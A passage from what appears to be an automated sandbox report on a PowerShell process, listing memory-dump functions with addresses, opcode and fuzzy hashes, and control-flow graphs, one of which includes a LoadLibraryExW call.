                                                                • Instruction Fuzzy Hash: B1B1D47050DA8D8FDB69EF28C8557E93BE1FF55310F14426AE84DC7692CB34A845CB82
                                                                Function 00007FFB4ABD5360 Relevance: .3, Instructions: 318COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689262612.00007FFB4ABD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4abd0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c70c8c64b030c57aed6b6146e89616dc12fd83bd0626add25528b39aed6ac2cd
                                                                • Instruction ID: ad7a4e03a006230361ef46135d9a63d3701252511e8abc38b355c1911458ba6f
                                                                • Opcode Fuzzy Hash: c70c8c64b030c57aed6b6146e89616dc12fd83bd0626add25528b39aed6ac2cd
                                                                • Instruction Fuzzy Hash: BEA144B590CA8A4FE7A5EF38C8542787BD1EF58314B2842FED44DC7592DE29AC418741
                                                                Function 00007FFB4AB0C3E4 Relevance: .1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e9efb63b5f679c161d3a5b76b3122bb79e6297402e968a6e60846779de81973f
                                                                • Instruction ID: 809879b7df0acfe01bfc820d03025d2b00468f2504d7561661d6435b5768989e
                                                                • Opcode Fuzzy Hash: e9efb63b5f679c161d3a5b76b3122bb79e6297402e968a6e60846779de81973f
                                                                • Instruction Fuzzy Hash: 0B313CB481E64E8EFBB5AF24CD8ABF83295FF42318F900179D40D96492CF386945CB51
                                                                Function 00007FFB4AB148FD Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4b530605fe383cafe8e654290a72e82b680a195eebd1282cfd50e864e8788a07
                                                                • Instruction ID: e9813c507c1ef9991c31743e71e6e2dd48b49e8d24cd9eb002911f11230f8c6e
                                                                • Opcode Fuzzy Hash: 4b530605fe383cafe8e654290a72e82b680a195eebd1282cfd50e864e8788a07
                                                                • Instruction Fuzzy Hash: A901D2A5A0E58A4FE741AF7CD4187B47F81EF8A3A0F1980F9D04CCB683D91D6C054391
                                                                Function 00007FFB4AB04185 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                • Instruction ID: 7dc19749b50b3fd87260ebf23902f5db8bec0122d93ff5ae488bd31bcbbc3ff1
                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                • Instruction Fuzzy Hash: FE01A77010CB0C4FDB44EF0CE091AA5B7E0FB95320F10056DE58AC3651DA36E881CB41
                                                                Function 00007FFB4AB14941 Relevance: .0, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54a4e86dc9cde6c45bb30ae267f2828c4bdeacc071175c11dbcf006179423831
                                                                • Instruction ID: cb771db2efc72f48c2f7b1932b36a35da5a6c3cbfcc72a027345275b50ade494
                                                                • Opcode Fuzzy Hash: 54a4e86dc9cde6c45bb30ae267f2828c4bdeacc071175c11dbcf006179423831
                                                                • Instruction Fuzzy Hash: 800121A1A0DAC64FE345AF3C94246B47B91EF86390F2840FAD08CCB5C7D9182C0583D2
                                                                Function 00007FFB4AB11E18 Relevance: .0, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14a64ba751fb0e1c1d0c1eacee57e5f50a5bb2e2454c9a3a7db295c10fe18e0b
                                                                • Instruction ID: cb88bf9d290c150e940ed653b6f11026cbd48a6b22b246b95ac8a9f93aefccb6
                                                                • Opcode Fuzzy Hash: 14a64ba751fb0e1c1d0c1eacee57e5f50a5bb2e2454c9a3a7db295c10fe18e0b
                                                                • Instruction Fuzzy Hash: 0CE0D89681EE5906E351BDAC94861F57FC0D7A4110F580EAED84CD2272D84959D583C2

                                                                Non-executed Functions

                                                                Function 00007FFB4AB12D77 Relevance: 5.2, Strings: 3, Instructions: 1417COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H$K_H$V_H
                                                                • API String ID: 0-2690011258
                                                                • Opcode ID: 61890503cc933d027f4f513a690fc33b76c6231b37312d3b289dc616d55fa136
                                                                • Instruction ID: dbb4924b482b1597441c44ef59558db6fabf18443ce12292d9c4b298e0bc7638
                                                                • Opcode Fuzzy Hash: 61890503cc933d027f4f513a690fc33b76c6231b37312d3b289dc616d55fa136
                                                                • Instruction Fuzzy Hash: C4C2507091994A8FE799EF28C858BB9B7A2FF98345F1041F9D00DD7692CE356D818F40
                                                                Function 00007FFB4AB15445 Relevance: .5, Instructions: 511COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1688808426.00007FFB4AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ffb4ab00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c404f14205c64e373c6bd40b4c967212e058f6363922998183ae88a2f2bad1b2
                                                                • Instruction ID: ff8062e9d1e261fcf2eaff5c68f11a8a2e1c7a7960f9108209afb9561ef643e5
                                                                • Opcode Fuzzy Hash: c404f14205c64e373c6bd40b4c967212e058f6363922998183ae88a2f2bad1b2
                                                                • Instruction Fuzzy Hash: 4AD1E4E7A0FAC20FF3655D2CFD463795E85EBD92A472843F7E098834DF5868990642C1

                                                                Execution Graph

                                                                Execution Coverage:2.2%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 10099 7ffb4aae664a 10101 7ffb4aae6c60 LoadLibraryExW 10099->10101 10102 7ffb4aae6ced 10101->10102

                                                                Executed Functions

                                                                Function 00007FFB4AAE664A Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 112 7ffb4aae664a-7ffb4aae6caf 115 7ffb4aae6cb9-7ffb4aae6ceb LoadLibraryExW 112->115 116 7ffb4aae6cb1-7ffb4aae6cb6 112->116 117 7ffb4aae6cf3-7ffb4aae6d1a 115->117 118 7ffb4aae6ced 115->118 116->115 118->117
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.1910872971.00007FFB4AAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AAD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ffb4aad0000_powershell.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 2f413caef7b04e666544b7e8f4abf6ed3e58fa086bb0f0ad461a588eaf5db275
                                                                • Instruction ID: d67f5e9d4b2f0cbc78231e80dbc73432b8aec3514b61c0e9dd6f0b2ba72f146d
                                                                • Opcode Fuzzy Hash: 2f413caef7b04e666544b7e8f4abf6ed3e58fa086bb0f0ad461a588eaf5db275
                                                                • Instruction Fuzzy Hash: BD21917190CA1C9FDB58DF6CD449AEABBE0FB69320F10822ED009D3251DB70A4468B91
                                                                Function 00007FFB4ABA33DA Relevance: .4, Instructions: 442COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 155 7ffb4aba33da-7ffb4aba33df 156 7ffb4aba3421-7ffb4aba3450 155->156 157 7ffb4aba33e1-7ffb4aba341a 155->157 160 7ffb4aba3452-7ffb4aba3464 156->160 157->160 161 7ffb4aba346a-7ffb4aba3474 160->161 162 7ffb4aba36cc-7ffb4aba378b 160->162 163 7ffb4aba3476-7ffb4aba3483 161->163 164 7ffb4aba348d-7ffb4aba3492 161->164 163->164 169 7ffb4aba3485-7ffb4aba348b 163->169 167 7ffb4aba3498-7ffb4aba349b 164->167 168 7ffb4aba3670-7ffb4aba367a 164->168 172 7ffb4aba349d-7ffb4aba34b0 167->172 173 7ffb4aba34b2 167->173 170 7ffb4aba3689-7ffb4aba36c9 168->170 171 7ffb4aba367c-7ffb4aba3688 168->171 169->164 170->162 177 7ffb4aba34b4-7ffb4aba34b6 172->177 173->177 177->168 178 7ffb4aba34bc-7ffb4aba34f0 177->178 192 7ffb4aba3507 178->192 193 7ffb4aba34f2-7ffb4aba3505 178->193 196 7ffb4aba3509-7ffb4aba350b 192->196 193->196 196->168 197 7ffb4aba3511-7ffb4aba3519 196->197 197->162 199 7ffb4aba351f-7ffb4aba3529 197->199 200 7ffb4aba3545-7ffb4aba3555 199->200 201 7ffb4aba352b-7ffb4aba3543 199->201 200->168 205 7ffb4aba355b-7ffb4aba358c 200->205 201->200 205->168 211 7ffb4aba3592-7ffb4aba35bb 205->211 216 7ffb4aba35bc-7ffb4aba35be 211->216 217 7ffb4aba35e9-7ffb4aba35ed 216->217 218 7ffb4aba35c0-7ffb4aba35e0 216->218 217->168 219 7ffb4aba35f3-7ffb4aba35fb 217->219 218->216 223 7ffb4aba35e2-7ffb4aba35e6 218->223 221 7ffb4aba360b 219->221 222 7ffb4aba35fd-7ffb4aba3607 219->222 227 7ffb4aba3610-7ffb4aba3625 221->227 224 7ffb4aba3627-7ffb4aba3656 222->224 225 7ffb4aba3609 222->225 223->217 231 7ffb4aba365d-7ffb4aba366f 224->231 225->227 227->224
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.1911710133.00007FFB4ABA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ffb4aba0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c2cc8af116a1d06069ab4d77dc18448ba7ac8a9ad1e6fb1034568ba2b7c630f
                                                                • Instruction ID: ca15ee45f02458b8ef143793292d100c0c7d30fec2431d7204da3d99a409b668
                                                                • Opcode Fuzzy Hash: 1c2cc8af116a1d06069ab4d77dc18448ba7ac8a9ad1e6fb1034568ba2b7c630f
                                                                • Instruction Fuzzy Hash: FDD134BA90EB894FE7A6AF78C8155F9BBD4EF16210B2800FED04DC7593D918A805C381